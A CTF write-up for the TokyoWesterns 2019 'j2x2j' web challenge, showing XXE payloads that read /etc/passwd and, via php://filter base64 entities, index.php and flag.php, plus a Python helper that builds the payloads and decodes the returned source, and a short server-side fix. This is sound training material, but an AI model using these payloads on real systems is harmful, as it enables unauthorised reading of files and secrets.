j2x2j TokyoWesterns CTF 5th 2019

Recently our team wanted to improve its CTFtime ranking, so we worked harder; this time it was TokyoWesterns CTF, and the following is a write-up of the j2x2j web challenge!

    Link: http://j2x2j.chal.ctf.westerns.tokyo/


At a glance I saw the phrase "JSON <-> XML Converter" in the title. Obviously, that immediately makes me think of XXE.

Back on the site's interface there are two boxes, one for JSON and one for XML. With the following payload (an external entity pointing at a local file) we can tell whether the converter really is vulnerable to XXE:

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>&test;</root>

Submit this payload and boom! The converter expands the entity and the contents of /etc/passwd come back in the converted output.


Later I found that the site was written in PHP, and my poison repository had weapons ready for that :) I used a PHP stream wrapper inside the XXE payload. Reading index.php through file:// does not work well, because the PHP source gets expanded as XML markup: the `<?php ... ?>` block is swallowed as a processing instruction, and any stray `<` or `&` in the code breaks the parse. The php://filter wrapper base64-encodes the file before the parser sees it, so the source comes back as one harmless string:

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
  <contact>
    <name>lnlinh31 &xxe; </name>
  </contact>
</contacts>





Look at the first line of index.php and you know what to do: point the same wrapper at flag.php.

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=flag.php"> ]>
<contacts>
  <contact>
    <name>lnlinh31 &xxe; </name>
  </contact>
</contacts>
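To make the three steps above repeatable, here is an added helper script (mine, not part of the original write-up or the challenge): it builds the file:// and php://filter payloads, pulls the base64 blob back out of the converter's response, and lists the include/require targets in the recovered PHP source, which is exactly how index.php led to flag.php. The JSON shape of the response and the sample PHP source are constructed assumptions, not captured from the challenge; the real form field name is not known from the write-up, so the script stops at building and decoding rather than sending.

```python
import base64
import re

# Added example for this write-up: helpers for driving an XXE file read
# through a JSON<->XML converter. The response format and sample source
# below are constructed assumptions, not captured from the challenge.

XXE_TEMPLATE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE replace [<!ENTITY xxe SYSTEM "{target}"> ]>\n'
    '<contacts>\n'
    '  <contact>\n'
    '    <name>lnlinh31 &xxe; </name>\n'
    '  </contact>\n'
    '</contacts>\n'
)


def file_payload(path):
    """Raw read through file://, fine for plain text such as /etc/passwd."""
    return XXE_TEMPLATE.format(target="file://" + path)


def php_filter_payload(resource):
    """Read via the php://filter stream wrapper. PHP source contains '<?php',
    '<' and '&'; expanded as an entity it is parsed as XML markup or breaks
    the parse, so base64-encoding it first keeps it opaque to the parser."""
    return XXE_TEMPLATE.format(
        target="php://filter/convert.base64-encode/resource=" + resource)


# A base64 blob of a real file is far longer than any JSON key or the name
# we put next to the entity, so a length floor is enough to pick it out.
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def recover_file(response_text):
    """Find the base64 blob the converter echoed back and decode it.
    Returns the file contents as text, or None if no blob is present."""
    m = B64_RE.search(response_text)
    if not m:
        return None
    blob = m.group(0)
    # re-pad in case the converter stripped trailing '=' characters
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def find_includes(php_source):
    """List files pulled in by include/require in recovered PHP source; this
    is the 'first line of index.php' step that points at the next target."""
    return re.findall(
        r"(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]",
        php_source)


# Constructed sample response (not from the challenge): the converter hands
# back JSON with the entity already expanded inside the name field.
SAMPLE_SOURCE = "<?php\nrequire_once('flag.php');\necho 'converter';\n"
SAMPLE_RESPONSE = '{"contacts":{"contact":{"name":"lnlinh31 %s "}}}' % (
    base64.b64encode(SAMPLE_SOURCE.encode()).decode())


if __name__ == "__main__":
    print(php_filter_payload("index.php"))
    src = recover_file(SAMPLE_RESPONSE)
    print(src)
    print("next targets:", find_includes(src))
```

The php:// wrapper only resolves because PHP's libxml loads external entities through PHP streams; the fix on the server side is to stop loading them at all (libxml_disable_entity_loader(true) before PHP 8.0, where external entity loading is already off by default) and never to pass LIBXML_NOENT to the parser.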


Flag: TWCTF{t1ny_XXE_st1ll_ex1sts_everywhere}


Hope this article satisfies you, thanks for reading :)

1 comment:

  1. What leads you to use php://filter/...? Where can I learn this? What is that called?